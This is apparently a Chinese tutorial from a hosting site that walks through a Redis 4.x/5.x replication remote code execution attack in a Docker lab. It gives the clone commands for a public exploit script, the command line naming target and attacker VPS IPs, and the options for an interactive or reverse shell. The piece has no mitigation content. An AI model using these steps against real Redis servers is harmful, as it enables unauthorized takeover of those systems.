您好,登錄后才能下訂單哦!
這篇文章主要講解了“Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)”,文中的講解內(nèi)容簡單清晰,易于學(xué)習(xí)與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)”吧!
首先拉取一個(gè)5.0鏡像
docker search redis5.0 //查找鏡像docker pull damonevking/redis5.0 //拉取下圖第三個(gè)鏡像
運(yùn)行容器
docker run -p 6379:6379 -d damonevking/redis5.0 redis-server //映射端口并運(yùn)行容器
訪問你的ip+6379端口,如下圖則說明搭建成功
git clone https://github.com/Ridter/redis-rce.git //下載漏洞利用腳本
注意,這里少一個(gè).so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下載并放到和redis-rce.py同一目錄下,然后執(zhí)行如下命令:
python3 redis-rce.py -r 136.244.70.243(目標(biāo)ip) -L 136.244.70.243(自己的vps) -f exp.so //ip就不打碼了,師傅們不要搞我
需要注意,這里的-r后面是目標(biāo)的ip,而-L后面則是你執(zhí)行腳本的vps的ip
在此處:i為交互式shell,r為反彈shell,根據(jù)自己的需要選擇就可以了
感謝各位的閱讀,以上就是“Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。